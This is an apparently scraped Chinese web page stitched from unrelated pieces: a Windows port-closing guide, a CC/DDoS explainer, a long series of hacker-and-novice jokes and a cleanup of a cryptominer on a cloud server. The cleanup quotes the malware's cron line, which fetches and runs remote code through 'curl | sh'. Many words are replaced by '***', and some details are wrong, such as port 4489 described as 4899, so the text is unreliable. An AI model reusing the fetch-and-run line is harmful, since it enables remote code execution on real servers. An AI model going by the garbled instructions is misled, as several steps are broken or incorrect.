黑客小白入侵网站,黑客 小白

hacker|
129

黑客为什么很难攻破360

道高一丈魔高一丈,但杀软也不是傻子,现在的云防御等技术已经非常难攻破了,而且它们并不是都是坏的,骇客就是专门破坏的,黑客是指 *** 高手或维护人员,红客指爱国的黑客,白帽黑客是在网上帮各种网站进行善意的入侵,就是帮助它们找到漏洞并修复,黑帽黑客和骇客差不多,总之你不用太担心,小心病毒就好了

怎么预防别人入侵我的电脑

1、打好补丁

2、开防活墙

3、关闭端口

***

我相信有很多人都不知道自己开了什么端口.更加不知道怎么关闭端口.

你可以用查看端口的软件查看.

也可以通过在运行里输入"cmd"

在弹出的cmd命令行里输入

netstat -an 来查看自己开放端口.ip地址的后面的就是端口号.

以下是我自己写的一篇关于关闭端口的详细步骤和多种 ***

有很多人问我如何关闭端口,所以我(流云)整理了一下关于关闭端口的资料,并给大家写这篇文章介绍关于关闭端口的多种 *** (包括系统的 *** :修改注册表和关闭服务;通过创建 IP 安全策略来屏蔽端口的 *** ;增加防火墙的规则屏蔽端口;通过本地连接的TCP/IP筛选来过滤端口;)由于入侵的基础就在于端口,所以关闭掉可能会被入侵的端口,这样你的电脑的安全悉数就提高了.这里先介绍一下,关于入侵最多的几个端口的系统关闭 *** .

1.系统关闭 *** :

(1)21端口:

端口说明: ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的 *** 。

这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器

作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分

类)的节点。

关闭 *** :控制面板--管理工具--服务

关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务

的管理单元提供 FTP 连接和管理。

(2)23端口

端口说明:Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫

描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入

侵者会找到密码。

关闭 *** :控制面板--管理工具--服务

关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控

制台程序。

(3)25端口

端口说明: *** tp 攻击者(spammer)寻找 *** TP服务器是为了传递他们的spam。

入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器

上,将简单的信息传递到不同的地址。 *** TP服务器(尤其是sendmail)

是进入系统的最常用 *** 之一,因为它们必须完整的暴露于Internet且

邮件的路由是复杂的(暴露+复杂=弱点)。

关闭 *** :控制面板--管理工具--服务

关闭Simple Mail Transport Protocol ( *** TP)服务,它提供的功能是

跨网传送电子邮件.

(4)80端口

端口说明:80端口是为HTTP(HyperText Transport Protocol,超文本传输协

议)开放的,这是上网冲浪使用最多的协议,主要用于在WWW

(World Wide Web,万维网)服务上传输信息的协议。

关闭 *** :控制面板--管理工具--服务

关掉WWW服务。在“服务”中显示名称为"World Wide Web

Publishing Service",通过Internet 信息服务的管理单元提供 Web

连接和管理。

(5)135端口

端口说明c-serv MS RPC end-point mapper Microsoft在这个端口运行DCE

RPC end-point mapper为它的DCOM服务。这与UNIX 111 端口的功

能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper

注册它们的位置。远端客户连接到机器时,它们查询end-point

mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到

诸如:这个机器上运行ExchangeServer吗?是什么版本?

关闭 *** :用一款16为编辑软件(推荐UltraEdit)打开你系统

winnt\system32 或者 x:\windows\system32下的rpcss.dll文件。

查找31 00 33 00 35

替换为30 00 30 00 30

查找3100330035,将其替换为3000300030,意思就是将135端口

改为000。至此修改的任务已经完成,下面将面临一个保存的问题。

因为该文件正在运行,在Windows环境下是不能覆盖的。如果你是

FAT32文件系统,那么直接引导进DOS环境,将修改好的文件覆盖掉

原来的文件。

如果是NTFS格式,相对就麻烦一些。进安全模式。然后启动pulist列

出进程,然后用pskill这个程序(黑客网站有下的)杀掉svchost.exe

程序。然后在COPY过去。

覆盖后重新启动,使用netstat -an命令,可以看到Windows 2000下

已经没有135端口了。XP系统还有TCP的135,但是UDP里面已经没有

135端口了。

(如果看不懂以上的 *** ,我帮大家找了一个有图片的关闭 ***

)

135端口的详细关闭 *** :

(6)139端口

端口说明: File and Print Sharing 通过这个端口进入的连接试图获

NetBIOS/ *** B服务。这个协议被用于Windows“文件和打印机共享”

和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

Ipc$就是要依赖这个端口的.

关于此端口的命令详解和入侵技巧请参照我发的帖子

;fpage=1

关闭 *** :139端口可以通过禁止N *** 来屏蔽

本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’

一项

(7)445端口:

端口说明: 445端口是般是信息流通数据的端口,一般黑客都是通过这个端口对你

的计算机或木马的控制,windows2000以后的版本都会自动打开这个

端口。一般流行性病毒,如冲击波,震荡婆,灾飞都是从这个端口对

计算机开始攻击!

关闭 *** :445端口可以通过修改注册表来屏蔽

添加一个键值

Hive: HKEY_LOCAL_MACHINE

Key: System\Controlset\Services\Net *** \Parameters

Name: *** BDeviceEnabled

Type: REG_DWORD

Value: 0

修改完后重启机器

(8)3389端口

端口说明: 3389又称Terminal Service,服务终端。在WindowsNT中更先开始使

用的一种终端,在Win2K的Professional版本中不可以安装,在Server

或以上版本才可以安装这个服务,其服务端口为3389。由于使用简

单,方便等特点,一直受系统管理员的青昧。也正式因为他的简便,

不产生交互式登陆,可以在后台操作,因此也受到了黑客朋友的喜

爱,事实可以说明,现在大多数朋友在入侵之后,都想打开windows

终端服务,甚至不惜重启对方的计算机,也要把终端服务安装上,由

此可见他的普遍性。另,在在XP系统中又叫做“远程桌面”。

关闭 *** :首先说明3389端口是windows的远程管理终端所开的端口,它并不是

一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须

的,请关闭该服务。

win2000关闭的 *** :

win2000server 开始--程序--管理工具--服务里找到Terminal Services服务项,

选中属性选项将启动类型改成手动,并停止该服务。

win2000pro 开始--设置--控制面板--管理工具--服务里找到Terminal Services

服务项,选中属性选项将启动类型改成手动,并停止该服务。

winxp关闭的 *** :

在我的电脑上点右键选属性--远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。

(9)4489端口

端口说明: 首先说明4899端口是一个远程控制软件(remote administrator)服务

端监听的端口,他不能 算是一个木马程序,但是具有远程控制功能,

通常杀毒软件是无法查出它来的,请先确定该服务是否是你自己开放

并且是必需的。如果不是请关闭它。

关闭 *** :请在开始--运行中输入cmd(98以下为command),然后cd

C:\winnt\system32(你的系统安装目录),输入r_server.exe /stop

后按回车然后在输入r_server /uninstall /silence 到C:\winnt\system32

(系统目录)下删除r_server.exe admdll.dll radbrv.dll三个文件

(10)默认共享:

很多人根本就还不知道有默认共享这么一回事,其实系统一装好都是打开默认共享的.把c,d默认共享为c$,d$.其实这个是相当危险的,这个就相当于开着门让黑课进来.可以通过很多种 *** 入侵.其中以ipc$最为著名.所以一定关闭它.关闭的 *** 有很多种.

端口说明:这是在安装服务器的时候,把系统安装分区自动进行共享,虽然对其访

问还需要超级用户的密码,但这是潜在的安全隐患,从服务器的安全考

虑,更好关闭这个“默认共享”,以保证系统安全。

关闭 *** :关于默认共享的关闭 *** 有很多种 *** .我这里根据自己所知的,归纳

了4种最常用的 *** .

1.DOS下删除共享

单击“开始/运行”,在运行窗口中输入“cmd”(98则是command),打开cmd命令行.用net share 命令查看自己是否开了默认共享和ipc$,所有的共享信息都可以在里面显示.选择你要的删除的共享.用net share xx /delete(此处的xx表示你要删除的共享文件)例如:net share c$ /delete 表示删除c盘的默认共享(根据我的经验net share c:\ /delete 其实也是一样删除c盘的默认共享的).

2.盘符属性

确定你要删除的盘符,单击鼠标右键选择共享和安全的选项.在弹出的窗口中选择不共享此文件夹.然后点确定.这样就关闭了共享(包括默认共享).

3.控制面板中删除

控制面板—管理工具—计算机管理—共享文件夹—共享

关闭里面的默认共享(包括admin$的删除)

4. 修改注册表

单击“开始/运行”,在运行窗口中输入“Regedit”,打开注册表编辑器,展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Lanmanworkstation\parameters”,在右侧窗口中创建一个名为“AutoShareWks”的双字节值,将其值设置为0,(win2000 专业版 win xp);[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

lanmanserver\parameters]"AutoShareServer"=dword:00000000 (win2000 server、win2003 server)这样就可以彻底关闭“默认共享”。

以上几个端口都是最常入侵的端口,也是最适合一般用户的电脑.至于其他特定软件所开放的端口可以根据通过创建 IP 安全策略来屏蔽端口的 *** ;增加防火墙的规则屏蔽端口;通过本地连接的TCP/IP筛选来过滤端口的 *** 来关闭端口.以下介绍一下通过创建 IP 安全策略来屏蔽端口的 *** 的 *** 来关闭端口,由于增加防火墙的规则屏蔽端口;通过本地连接的TCP/IP筛选来过滤端口的 *** 和过创建 IP 安全策略来屏蔽端口的 *** 差不多,所以就不重复讲了.这里就先介绍一下创建 IP 安全策略来屏蔽端口的 *** .

2.创建 IP 安全策略来屏蔽端口:

关闭的端口有,135,137,138,139,445,1025,2475,3127,6129,3389,593,还有tcp.

具体操作如下:

默认情况下,Windows有很多端口是开放的,在你上网的时候, *** 病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些 *** 端口:

之一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”(如右图),于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。

第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,

随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”

左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。

第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;

点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击

“确定”按钮(如左图),这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑 。

点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593

端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。

第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,

最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加

“阻止”操作(右图):在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。

第五步、进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。

在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。

于是重新启动后,电脑中上述 *** 端口就被关闭了,病毒和黑客再

也不能连上这些端口,从而保护了你的电脑。

本人建议:如果你要关闭的端口是比较常见的入侵端口的话,我建议你采用系统的关闭 *** .这样更加直接和有效.而一般的端口的话,你不想开可以采用ip安全策略或者防火墙或者TCP\IP筛选来关闭.将来你想开这个端口或者软件需要用的时候,只要去掉规则就可以了.这里还有提醒大家一点,端口从1024开始到65535都是应用程序所开启的端口(当然也包括木马和病毒).除非你很确定这个端口是木马或者病毒或者是没用途的端口,不然不建议关闭.不然会出现很多问题.

以下是电脑端口基础知识

端口可分为3大类:

1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

由于时间的关系,稍微就介绍以上的几种 *** .其实关闭端口还有很多种 *** .这里就先介绍到这里吧.如果文章有什么不足之处.希望大家提出来.我一定好好修改

小白话说CC攻击与DDOS

前几天,公司的网站遭受了CC攻击,整理了下今天我们简单说说CC攻击与DDOS。

DDoS 攻击

DDoS是Distributed Denial of Service的英文缩写,意思是“分布式拒绝服务攻击”,那么什么是ddos呢?可以这么理解,凡是导致合法用户不能够正常访问 *** 服务的行为都算是ddos攻击。

一旦实施分布式拒绝服务攻击,攻击 *** 数据包就会从多个DOS攻击源(俗称肉鸡)犹如洪水般涌到受害主机,从而导致主机无法正常接收合法用户的 *** 数据包,这样就导致网站打不开了。也就是说,ddos攻击的目的非常明确,就是阻止正常的用户访问正常的 *** 资源,从而达到攻击者不可告人的目的。与其他恶意数据篡改或劫持攻击不同,DDoS简单粗暴,可以直接摧毁目标。另外,与其他攻击方式相比,DDoS技术要求低,攻击成本低,只需要购买一些服务器或者控制一批肉鸡。而且对应的攻击速度很快,攻击效果可见。另一方面,DDoS具有易攻难守的特点,服务提供商需要花费大量资源对抗攻击发起者,才能满足正常客户的需求。这些特点使得DDoS成为黑客手中一把利剑。虽然DDoS可以侵蚀带宽或资源,迫使服务中断,但远非黑客的真实目的,所谓没有买卖就没有伤害,DDoS只是黑客手中的核武器,他们的目的要么是敲诈勒索,要么是商业竞争,要么是政治立场。在这种黑色利益的驱使下,越来越多的人参与到这个行业中来,完善和升级攻击手段,使得DDoS在互联网行业中愈演愈烈,成为一种在全球范围内无法克服的顽疾。

CC攻击

CC攻击(Challenge Collapsar)是DDOS攻击的一种,也是一种常见的网站攻击方式,它利用 *** 服务器向受害服务器发送大量看似合法的请求,导致网页无法正常访问。攻击者通过 *** 服务器或肉鸡向受害主机不断发送大量数据包,导致对方服务器CPU长时间100%占用,网页无法打开。让站长最担心的是这种攻击的技术含量低,利用更换IP *** 和使用一些IP *** 一个初、中级电脑水平的用户都能够实施攻击。之所以选择 *** 服务器,是因为 *** 可以有效隐藏自己的身份,绕过防火墙,因为基本上所有的防火墙都会检测并发TCP/IP连接的数量,如果超过一定的数量和频率,就会被认为是Connection-Flood。

CC攻击是目前攻击应用层的主要手段之一,应用层是我们的用户可以看到的,比如网页。每个人或许都有这样的经历:当一个网页被非常多的人访问时,打开一个网页是很慢的。访问一个静态页面并不需要太长时间,即使人很多。但是,如果你访问论坛、贴吧等。在高峰期,它会非常慢,因为服务器系统需要去数据库判断访问者是否有权限阅读帖子、发言等。访问量越大,论坛的页面越多,对数据库的压力越大,被访问的频率越高,占用的系统资源也会越高。CC攻击充分利用了这一特性,模拟很多正常用户不断访问论坛等需要大量数据操作的页面,造成服务器资源的浪费,导致CPU长时间处于100%状态,永远都有处理不完的连接,致使 *** 拥塞,造成网站无法被正常访问。

总结

不论是ddos还是cc攻击都是让人们头疼的一件事,高级的D阔甚至可以导致譬如京东、百度等大型网站打不开,每年的 *** 攻击量都是十分巨大的,还记得之前听过的一个故事,某个购物网站市值5个亿,而某商业大佬想要收购该网站但并不想付五个亿,于是便请来了一位高端D阔,造成该购物网站30天无法正常访问,直接使这个购物网站市值下降到了两个亿。其实许多大型网站都遭受着 *** 攻击,DDoS攻击的产业化不仅增加了打击难度,还降低了DDoS攻击的实施门槛, *** 安全已经刻不容缓。

一篇小白与黑客的笑话

黑客:我控制了你的电脑

小白:怎么控制的?

黑客:用木马

小白:……在哪里?我为什么看不见?

黑客:打开你的任务管理器

小白:“我的电脑”里没有啊

黑客:算了,当我什么也没做过

黑客:我已经控制了你的电脑

小白:哦

黑客:害怕了吧?!嘿嘿

小白:来的正好,帮我杀杀毒吧,最近我的机子毛病很多耶

黑客:……

小白:你怎么总是在我的电脑里随便进进出出?

黑客:你可以装防火墙

小白:装防火墙,你就不能进入了吗?

黑客:不啊,我只是想增加点趣味性,这样控制你的电脑让我觉得很白吃

小白:听说你会制造“病毒”?

黑客:嗯

小白:你可以控制别人的电脑?!

黑客:一般是的

小白:那你可以黑掉那些网站吗?

黑客:当然,没听到人家叫我“黑客”吗?

小白:……哦,我还以为那是因为你长得很黑……

“硄!“

黑客:我又来了!!

小白:你天天进来不觉得很烦吗?

黑客:是很烦,你的机子是我见过的最烂的一台了

小白:不是吧,这可是名牌

黑客:我是说你的机子里除了弱智游戏就只有病毒了

小白:哦,那你看到我的“连连看”了吗?不记得装在哪,找了好久了耶

黑客:……再见

黑客:嗨!我来了

小白:好几天不见你,被我的防火墙挡住啦?

黑客:哈哈,笑话,上你的机子比我的还容易,不是想我了吧?

小白:我是想请你帮一个忙

黑客:什么事?

小白:你能不能进入电力系统修改一点数据

黑客:……你想干吗!!

小白:求求你,帮我把我家这个月得电费消了吧……

黑客:去死!!

黑客:你死哪去了?!!

小白:……出去玩了几天啊,找 *** 吗?

黑客:我要找点东西

小白:在我这儿找什么东西?

黑客:病毒,找一条前几年的老病毒,只有你的机子上病毒保存的最全啦!

黑客:我来了!!

小白:……

黑客:怎么不说话?

小白:心情不好

黑客:谁欺负你了?

小白:我的一个抠抠号搞丢了,里面有我的网上初恋

黑客:这个简单,我帮你拿回来

小白:拿不回来了

黑客:不可能,告诉我,多少号?

小白:呜……就是不记得了

小白:你给我出来!!!!

黑客:怎么啦?!

小白:你是不是用我的ID去论坛玩了?!!

黑客:。。。。不好意思,忘了告诉你了,不过,我没干坏事,就瞎编了个贴子,我保证下次再也不玩了

小白:那不行!!!

黑客:你还要怎么样?

小白:你发的贴子得红脸了耶,我之一次得红脸,好开心哦,你必须再给我编一个

黑客:倒!

黑客:嘿嘿,刚才我做了一件很有趣的事

小白:什么事

黑客:我到论坛上去顶贴了

小白:这很平常啊

黑客:我见贴就顶,尽情的骂楼主是猪,好解气

小白:哇塞,太过瘾了,我可从来不敢,会被封杀的!

黑客:没错,已经被封杀了。

小白:这还有趣?!

黑客:是啊,因为我用的是你的ID

小白:你是高手吗?

黑客:可以说是吧。

小白:高到什么程度?

黑客:嗯,我无聊的时候就自己黑自己

小白:哈,这个我也会!

黑客:#¥%!你也可以?!

小白:是啊,一关机它就黑了。。。。。

黑客:滚开........!

白:小黑,快出来,我的抠抠密码被盗用了,555~~~~

黑客:没问题,我给你找回来......(十分钟后)没有啊,我用你的号码登陆没有问题啊......

小白:那我为什么上不去?

黑客:我看看........姐姐,你打开的好像是m!s!n的登陆框......

小白:哦,原来这两个不能通用啊......

黑客:光当........

小白:小黑,快出来!!!

小黑:什么事情啊?我还没睡醒啊!

小白:为什么我的抠抠密码输不进去啊?

小黑:你用什么输的啊?

小白:当然是小键盘拉,笨蛋!

小黑:............你的小键盘没打开怎么输的进去啊?

小白:你帮我打开撒!!!

小黑:............................(吐血中)

小白:小黑,快告诉google是什么?

黑客:是搜索引擎,就是你找东西很快的!

小白:嗯,我试试,

黑客:试了没有

小白:试了,我用baidu一下子就找到goolge了,

黑客:你能涌用石头扔我一下

小白:我们见见面好吗?

黑客:........这、不太好吧,为什么要见

小白:我想看看你是不是和我想的一样

黑客:呵,你想的什么样?

小白:很帅,穿着紧身衣,又很神奇,哪里都能去,到处维持世界和平啦

黑客:........你说的是蜘蛛侠,老大!

黑客:哈喽~~~

小白:你每天都来,是不是对我很好奇?

黑客:不是好奇,是习惯,顺手就进来了

小白:哼,我有个好办法可以改变你的这个习惯

黑客:........哦?!什么办法

小白:我去电信局把带宽改成1K,这样你就挤进不来了,因为太窄,哈哈~~

黑客:天才啊!..........那你还能上网吗?

小白:能啊,慢慢上呗!

小白:我今天学到点电脑知识.很厉害的

黑客:说说看.

小白:可以一次就让电脑上什么东西都看不到.

黑客:晕!怎么可能,从来没听说过.

小白:把显示器关掉就什么都没有了,哈哈,聪明吧~

黑客:``````````去死~

黑客:你电脑桌面上怎么那么多东西?

小白:方便寻找啊.

黑客:可你把DVD电影放桌面上干吗?

小白:偶稀饭看那电影啊,好感人的.

黑客:`````````````

小白:小黑,问你哦,怎么电脑右下角老提示"C盘空间不足释放```````"

黑客:靠!

黑客:喂!

黑客:喂!小白~

黑客:怎么不理我了?

小白:我在哭.

黑客:啊?怎么啦?谁欺负你了?

小白:不是,没谁欺负我

黑客:那怎么哭噢?

小白:看蜡笔小新,小新迷路了~他好可怜~555555~

黑客:-_-|||,那你继续哭!!!!

小白:我想装杀毒软件

黑客:恩,好,你电脑是需要一个杀毒的.

小白:我要装名牌的,更好是SONY的,要不就宝马也行.

黑客:adidas好不好?

小白:行,你帮我装一下吧.

黑客:靠!我有事!

小白:小黑,假如我想删除电脑上没用过的东西,但又删不掉怎么办?

黑客:可以在启动电脑时,按F8,进"带命令的安全模式"-"路径"-再DEL文件名,OK了~

小白:我想把C盘中windows这东东删掉

黑客:那是系统文件夹

小白:可我都一直没用过它啊.

黑客:我不应该和你讨论这问题的!靠~

小白:你真的觉得偶很 *** ?

黑客:是根本就是.

小白:偶网友都说偶很聪明的

黑客:他们怎么说的?

小白:不告诉你*_*

黑客:一定是你又把PLMM的照片发给他们看了是吧?

小白:你怎么知道?~~~~

黑客:靠!!

小白:小黑噢?你暑假有米有有趣的事?

黑客:有啊,怎么突然问这个?

小白:那你发给偶,详细点..

黑客:哦,那你等等..

(15分钟过后)

黑客:不对啊,你要我发给你干吗?

小白:偶老师要偶交暑假作业,记暑假有趣的事10篇..

黑客:靠靠靠!!

黑客:我们认识有一段时间了吧?

小白:恩啊

黑客:你觉得我对你好不好?

小白:还不错..

黑客:嘻嘻(害羞)

小白:干吗?要借钱啊?

黑客:````````````

小白:偶米钱,还欠班长5块钱没还呢!

黑客:````````````当我什么都没问..

小白:出来!问你!·黑客:什么?

小白:你会盗抠抠么?

黑客:废话!

小白:那你帮偶盗一抠抠号..

黑客:说号码..

小白:10000

黑客:!·#¥%……—*

黑客:我又来了..

小白:来得正好,我有事求你..

黑客:什么事?这次不是让我帮你把水费也改了吧!

小白:你会破解密码吗?

黑客:废话,我是黑客唉............

小白:帮我把达芬奇密码解一下吧!

黑客:去死, *** 电影看多了............

小白:你每天进我的电脑觉得有意思吗?

黑客:有意思啊!

小白:有什么意思

黑客:我在研究你这满是病毒的机子为什么不死机..

小白:我知道啊!

黑客:........#¥%!为什么?

小白:这叫以毒攻毒!

小白:我也想控制你的电脑

黑客:那不行,别人进入我电脑我会疯的

小白:这不公平!!

黑客:嗯,好吧,那你控制好了

小白:........可是我不会........

黑客:嘎嘎~~~所以我才同意啊!!!

黑客:我又又又来了

小白:这可能是我们最后一次见面了

黑客:哦?出什么事了?

小白:我要重装系统,杀毒,装防火墙,不让你进来了!

黑客:原来你这么讨厌我..........好吧,以后我不来了,再见

小白:嗯..........哎,等一等!!先教我什么是重装系统!

黑客:....................

小白:电脑方面的问题你能回答吗?

黑客:应该可以

小白:键盘上哪个键最帅?

黑客:..............不知道

小白:当然是"F4"!!

黑客:晕倒!

小白:再问你一个电脑方面的问题你能回答吗?

黑客:只要不是你的 *** 问题

小白:我是认真的!!你能操作我电脑吗?

黑客:嗯,是的

小白:那出问题了,你也能解决吧

黑客:你的问题,应该不难

小白:太好了,我的风扇好像不转了,帮我换一个吧

黑客:........我先走了

黑客:在玩什么呢?

小白:在清理电脑

黑客:你?!

小白:对啊,你说我这里病毒多,所以我准备把不认识的看不顺眼的文件统统删掉

黑客:住手!你才认识几个文件啊?你的机子不想要了?

小白:那我现在怎么办?

黑客:别动机子,上一边玩去吧

黑客:HI,小白,这段时间没见我想我了没?

小白:才没有想你,不过你来的正好..

黑客:又出了什么事?

小白:我用驴子下电影,可是,硬盘空间不够,你能想个办法吗?

黑客:我来看看~!~

黑客:小白,告诉你一个不幸的消息,由于你的电脑里病毒太多,病毒又生下了很多仔,都在争地盘了..

小白:啊~!~天那!

黑客:我还在听病毒们在小声议论说什么空间价又上涨了,好多病毒都买不起空间了,正准备发起暴动了..

小白:那怎么办呀?

黑客:这个简单,把空间价下调,买个硬盘啦~!~

小白:555555我的密码又忘记了

黑客:记性不好就把密码写在纸上嘛

小白:太长又复杂,抄一遍都能把人累死

黑客:就你这智力,设那么长密码干什么

小白:我觉得只有复杂到自己都记不住才能防止别人破译

黑客:结果你的密码唯一作用是难为了自己........

黑客:世界杯要开始了,男人的节日啊!

小白:不光男人,我也喜欢呢~~

黑客:你?!你能看懂足球?

小白:是啊,每届世界杯我都会爬起来看的

黑客:哈,太好了,我们终于可以有共同语言了,你喜欢哪支球队啊

小白:当然是中国队!!

黑客:没语言......

小白:出来~

黑客:什么事情啊?

小白:电影能复制吗?

黑客:能啊

小白:为什么我的电影不能复制?

黑客:你用什么复制的?

小白:笨蛋,当然是软盘了!

黑客:@#%^^%

小白:小黑,来了吗?

红客:我是红客,追踪一个黑客来到这的~

黑客:你在说我吗?^-^

红客:――|||他的机子里怎这么多病毒,是你干的吗?!

黑客:==|||有些吧,我来之前跟现在都差不多的~不信你问他自己

小白:才不是呢!

小黑:..........

小白:他来了之后我的风扇不转了,郁闷!

黑客:....................

红客:..........................

黑客:我靠!

小白:我今天帮同学修了电脑

黑客:就你?

小白:对啊..

黑客:天大的奇迹,你居然会修电脑????

小白:有什么好奇怪,她光驱不能读电影碟..

黑客:她是不是把DVD电影放到VCD光驱,然后放不出来?

小白:对啊,所以偶就知道肯定是她光驱坏了,叫她明天再买个VCD光驱..

黑客:······

小白:我想买个笔记本

黑客:软面抄还是硬面抄?

小白:晕倒,是笔记本电脑啦!

黑客:你买那个干什么?

小白:玩游戏、上网,关键是要漂亮、轻巧,方便带出去,最最重要的是一定要比隔壁阿花用的神气,你说我买哪种好呢?

黑客:这么高的要求啊,"文曲星"吧,最适合你啦!

小白:你能帮我个忙吗?

黑客:只要是 *** 上的,说!!!

小白:我在玩――-跑跑卡丁车..你帮我去偷一个由8个排气筒的车!

黑客:那是在韩国服务器里面才有的!

小白:我不管!!!你从韩国给我偷过来!我要在中国用!那我不就很牛了!呵呵~~~!

黑客:……………………我还有事,我先走了!

小白:你会玩劲舞团吗?

黑客:会!干嘛?

小白:你帮我弄个汤姆.克鲁斯上来!我好稀饭他呀!让他陪我跳舞!:)

黑客:88

黑客:我想问你一个问题

小白:问吧

黑客:............你有男朋友吗?

小白:有!

黑客:..........他是什么样的人?

小白:高大、英俊、威猛,开大公司,对我超级好..

黑客:哦,有点事我先走了......

小白:喂~喂喂~~~~~

小白:咦,怎么好久没看到你啊,被抓了?!

黑客:..........没有,挺忙的,你还好吗

小白:好啊,我也挺忙的,我把连连看玩通关了!!

黑客:..........你和男朋友还好吧

小白:男朋友?什么男朋友?

黑客:你不是有个高大英俊威猛的男朋友吗?!

小白:哦哦~~~~瞎编的,怕你小看我........

黑客:......你、这个超级大笨蛋!!!!

黑客:..............我喜欢你

小白:病毒?

黑客:什么病毒啊?我是说很不幸,我发现我很喜欢你

小白:又忽悠我,你总骂我 *** 的

黑客:对啊,你就是个大 *** ,但我为了维持世界和平,决定牺牲自己,免得你去祸害他人..

小白:..................

小白:你真的喜欢我吗

黑客:..........嗯

小白:有多喜欢

黑客:就是不见的时候心里空空的疼,见了呢,头很疼

小白:哦,明白了

黑客:??你明白什么了?

小白:原来你对我,就像一个有蛀牙的小孩面对巧克力!

黑客:笔记本你可以买这款

小白:哦,这个好吗

黑客:配置不错,牌子和售后都不错

小白:这个无所谓,重要的是都有什么颜色?

黑客:............只有黑色

小白:啊?!难道这些商家不考虑消费心理,不知道加点颜色或者做成汉堡包的样子吗?

黑客:嗯,要不先去玩具柜台看看?!

一天,一陌生人加了黑客.

陌生人:你好

黑客:闲人勿扰

陌生人:我是美女!不许对美女这么没礼貌

黑客:可惜,我已经有喜欢的人了

陌生人:我比你喜欢的人漂亮100倍

黑客:但她在我心理是最美的

陌生人:好肉麻

黑客:恕不奉陪

陌生人:喂....

....

黑客(暗爽):小白,小白,连IP都没变还想考验我??

阿里云服务器被挖矿了怎么办?(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL | sh

病毒文件内容如下,感兴趣的可以研究下:

 View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

2条大神的评论

  • avatar
    访客 2023-03-20 下午 08:33:33

